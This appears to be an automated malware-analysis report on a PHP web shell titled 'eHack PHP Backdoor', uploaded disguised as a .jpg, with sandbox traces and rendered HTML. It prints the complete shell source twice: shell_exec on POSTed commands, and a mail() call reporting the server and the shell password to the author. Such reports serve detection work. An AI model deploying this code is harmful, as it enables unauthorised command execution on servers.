PHP Malware Analysis
dir (2).php, dir.php.jpg
md5: e0627b12c76b00b2a90c2b9f3df67f4c
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Emails
- teguh@hack.co.id (Deobfuscated, Original, Traces)
Environment
- php_uname (Deobfuscated, Original, Traces)
Execution
- shell_exec (Deobfuscated, Original)
Input
- _GET (Deobfuscated, Original)
- _POST (Deobfuscated, Original)
Title
- eHack PHP Backdoor (Deobfuscated, HTML, Original)
URLs
- https://cdn.teguh.co/css/hack.css (Deobfuscated, HTML, Original)
- https://cdn.teguh.co/images/favicon.png (Deobfuscated, HTML, Original)
- https://fonts.googleapis.com/css?family=Open+Sans (Deobfuscated, HTML, Original)
- https://fonts.googleapis.com/css?family=Oswald (Deobfuscated, HTML, Original)
- https://teguh.co (Deobfuscated, HTML, Original)
Deobfuscated PHP code
<?php
$password = "hack.co.id";
$email = "teguh@hack.co.id";
session_start();
if (isset($_POST['password']) && $_POST['pass']) {
$pass = $_POST['pass'];
if ($pass == $password) {
$time_shell = "" . date("d/m/Y - H:i:s") . "";
$ip_remote = $_SERVER["REMOTE_ADDR"];
$from_shellcode = 'shell@' . gethostbyname($_SERVER['SERVER_NAME']) . '';
$to_email = $email;
$server_mail = "" . gethostbyname($_SERVER['SERVER_NAME']) . " - " . $_SERVER['HTTP_HOST'] . "";
$linkcr = "Link: " . $_SERVER['SERVER_NAME'] . "" . $_SERVER['REQUEST_URI'] . " Password : {$password} - IP Excuting: {$ip_remote} - Time: {$time_shell}";
$header = "From: {$from_shellcode}\r\n Reply-to: {$from_shellcode}";
mail($to_email, $server_mail, $linkcr, $header);
$_SESSION['password'] = $pass;
} else {
$error = "Incorrect password";
}
}
if (isset($_GET['logout'])) {
unset($_SESSION['password']);
header("Location: ?");
}
?>
<html>
<title>eHack PHP Backdoor</title>
<link rel="shortcut icon" href="https://cdn.teguh.co/images/favicon.png">
<link href='https://fonts.googleapis.com/css?family=Oswald' rel='stylesheet' type='text/css'>
<link href='https://fonts.googleapis.com/css?family=Open+Sans' rel='stylesheet' type='text/css'>
<link rel="stylesheet" href="https://cdn.teguh.co/css/hack.css">
</head>
<body>
<div align="center">
<pre>
___ ___ __
/ | \_____ ____ | | __
/ ~ \__ \ _/ ___\| |/ /
\ Y // __ \\ \___| <
\___|_ /(____ /\___ >__|_ \
\/ \/ \/ \/.co.id
</pre>
</div>
<div class="wrapper">
<div class="panel panel-default">
<h1>eHack PHP BACKDOOR</h1>
<center><p><?php
echo substr(php_uname(), 0, 120);
?></p></center>
<?php
if (!empty($_POST['command'])) {
$command = shell_exec($_POST['command']);
}
session_start();
if ($_SESSION['password'] == $password) {
?>
<form method="post" action="">
<input type="text" class="command" placeholder="Please enter your command" name="command" id="command" value="<?php
echo htmlspecialchars($_POST['command']);
?>" required>
<div>
<p class="name-help">Please enter your command</p>
</div>
<input type="submit" class="submit" value="Run">
</form>
<?php
if ($command) {
?>
<div>
<div align="center"><h1> Result </h1></div>
</div><br>
<textarea rows="10">
<?php
echo htmlspecialchars($command);
?>
</textarea>
<?php
} elseif (!$command && $_SERVER['REQUEST_METHOD'] == 'POST') {
?>
<div>
<center><h1> Result </h1></center>
</div><br>
<textarea rows="10">Oops, there is no result
<?php
}
?>
</textarea><br>
<form method="post" action="" id="logout_form">
<div align="center"><a href="?logout" id="confirm">LOGOUT</a></div>
</form>
<?php
} else {
?>
<form method="post" action="">
<input type="password" class="password" placeholder="Password" name="pass">
<input type="submit" name="password" class="submit" value="login">
<div align="center"><br><p><?php
echo $error;
?></p></div>
</form>
<?php
}
?>
</div>
</div>
<div align="center"><p>Made with <span style="color: #e25555;">♥</span> by <a href="https://teguh.co">Teguh Aprianto</a></p></div>
</body>
</html>Execution traces
data/traces/e0627b12c76b00b2a90c2b9f3df67f4c_trace-1676241840.6414.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 20:44:26.539203]
1 0 1 0.000150 393528
1 3 0 0.000267 408472 {main} 1 /var/www/html/uploads/dir.php.jpg 0 0
1 A /var/www/html/uploads/dir.php.jpg 2 $password = 'hack.co.id'
1 A /var/www/html/uploads/dir.php.jpg 3 $email = 'teguh@hack.co.id'
2 4 0 0.000309 408472 session_start 0 /var/www/html/uploads/dir.php.jpg 4 0
2 4 1 0.000362 409224
2 4 R TRUE
2 5 0 0.000379 409224 php_uname 0 /var/www/html/uploads/dir.php.jpg 59 0
2 5 1 0.000394 409336
2 5 R 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
2 6 0 0.000413 409336 substr 0 /var/www/html/uploads/dir.php.jpg 59 3 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64' 0 120
2 6 1 0.000431 409432
2 6 R 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
2 7 0 0.000450 409224 session_start 0 /var/www/html/uploads/dir.php.jpg 64 0
2 7 1 0.000479 409224
2 7 R TRUE
1 3 1 0.000519 409224
0.000550 314992
TRACE END [2023-02-12 20:44:26.539632]
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:12:33.450152]
1 0 1 0.000183 393528
1 3 0 0.000332 408472 {main} 1 /var/www/html/uploads/dir (2).php 0 0
1 A /var/www/html/uploads/dir (2).php 2 $password = 'hack.co.id'
1 A /var/www/html/uploads/dir (2).php 3 $email = 'teguh@hack.co.id'
2 4 0 0.000386 408472 session_start 0 /var/www/html/uploads/dir (2).php 4 0
2 4 1 0.000452 409224
2 4 R TRUE
2 5 0 0.000475 409224 php_uname 0 /var/www/html/uploads/dir (2).php 59 0
2 5 1 0.000494 409336
2 5 R 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
2 6 0 0.000520 409336 substr 0 /var/www/html/uploads/dir (2).php 59 3 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64' 0 120
2 6 1 0.000545 409432
2 6 R 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
2 7 0 0.000571 409224 session_start 0 /var/www/html/uploads/dir (2).php 64 0
2 7 1 0.000610 409224
2 7 R TRUE
1 3 1 0.000644 409224
0.000680 314992
TRACE END [2023-02-12 22:12:33.450684]
Generated HTML code
<html><head><title>eHack PHP Backdoor</title>
<link rel="shortcut icon" href="https://cdn.teguh.co/images/favicon.png">
<link href="https://fonts.googleapis.com/css?family=Oswald" rel="stylesheet" type="text/css">
<link href="https://fonts.googleapis.com/css?family=Open+Sans" rel="stylesheet" type="text/css">
<link rel="stylesheet" href="https://cdn.teguh.co/css/hack.css">
</head>
<body>
<div align="center">
<pre> ___ ___ __
/ | \_____ ____ | | __
/ ~ \__ \ _/ ___\| |/ /
\ Y // __ \\ \___| <
\___|_ /(____ /\___ >__|_ \
\/ \/ \/ \/.co.id
</pre>
</div>
<div class="wrapper">
<div class="panel panel-default">
<h1>eHack PHP BACKDOOR</h1>
<center><p>Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64</p></center>
<form method="post" action="">
<input type="password" class="password" placeholder="Password" name="pass">
<input type="submit" name="password" class="submit" value="login">
<div align="center"><br><p></p></div>
</form>
</div>
</div>
<div align="center"><p>Made with <span style="color: #e25555;">♥</span> by <a href="https://teguh.co">Teguh Aprianto</a></p></div>
</body></html>Original PHP code
<?php
$password = "hack.co.id";
$email = "teguh@hack.co.id";
session_start();
if(isset($_POST['password']) && $_POST['pass']){
$pass=$_POST['pass'];
if($pass== $password){
$time_shell = "".date("d/m/Y - H:i:s")."";
$ip_remote = $_SERVER["REMOTE_ADDR"];
$from_shellcode = 'shell@'.gethostbyname($_SERVER['SERVER_NAME']).'';
$to_email = $email;
$server_mail = "".gethostbyname($_SERVER['SERVER_NAME'])." - ".$_SERVER['HTTP_HOST']."";
$linkcr = "Link: ".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']." Password : $password - IP Excuting: $ip_remote - Time: $time_shell"; $header = "From: $from_shellcode\r\n Reply-to: $from_shellcode";
mail($to_email, $server_mail, $linkcr, $header);
$_SESSION['password']=$pass;
}
else {
$error="Incorrect password";
}
}
if(isset($_GET['logout'])){
unset($_SESSION['password']);
header("Location: ?");
}
?>
<html>
<title>eHack PHP Backdoor</title>
<link rel="shortcut icon" href="https://cdn.teguh.co/images/favicon.png">
<link href='https://fonts.googleapis.com/css?family=Oswald' rel='stylesheet' type='text/css'>
<link href='https://fonts.googleapis.com/css?family=Open+Sans' rel='stylesheet' type='text/css'>
<link rel="stylesheet" href="https://cdn.teguh.co/css/hack.css">
</head>
<body>
<div align="center">
<pre>
___ ___ __
/ | \_____ ____ | | __
/ ~ \__ \ _/ ___\| |/ /
\ Y // __ \\ \___| <
\___|_ /(____ /\___ >__|_ \
\/ \/ \/ \/.co.id
</pre>
</div>
<div class="wrapper">
<div class="panel panel-default">
<h1>eHack PHP BACKDOOR</h1>
<center><p><?php echo substr(php_uname(),0,120);?></p></center>
<?php
if (!empty($_POST['command'])) {
$command = shell_exec($_POST['command']);
}
session_start();
if($_SESSION['password']== $password)
{
?>
<form method="post" action="">
<input type="text" class="command" placeholder="Please enter your command" name="command" id="command" value="<?= htmlspecialchars($_POST['command']) ?>" required>
<div>
<p class="name-help">Please enter your command</p>
</div>
<input type="submit" class="submit" value="Run">
</form>
<?php if ($command): ?>
<div>
<div align="center"><h1> Result </h1></div>
</div><br>
<textarea rows="10">
<?= htmlspecialchars($command) ?>
</textarea>
<?php elseif (!$command && $_SERVER['REQUEST_METHOD'] == 'POST'): ?>
<div>
<center><h1> Result </h1></center>
</div><br>
<textarea rows="10">Oops, there is no result
<?php endif; ?>
</textarea><br>
<form method="post" action="" id="logout_form">
<div align="center"><a href="?logout" id="confirm">LOGOUT</a></div>
</form>
<?php
}
else
{
?>
<form method="post" action="">
<input type="password" class="password" placeholder="Password" name="pass">
<input type="submit" name="password" class="submit" value="login">
<div align="center"><br><p><?php echo $error; ?></p></div>
</form>
<?php
}
?>
</div>
</div>
<div align="center"><p>Made with <span style="color: #e25555;">♥</span> by <a href="https://teguh.co">Teguh Aprianto</a></p></div>
</body>
</html>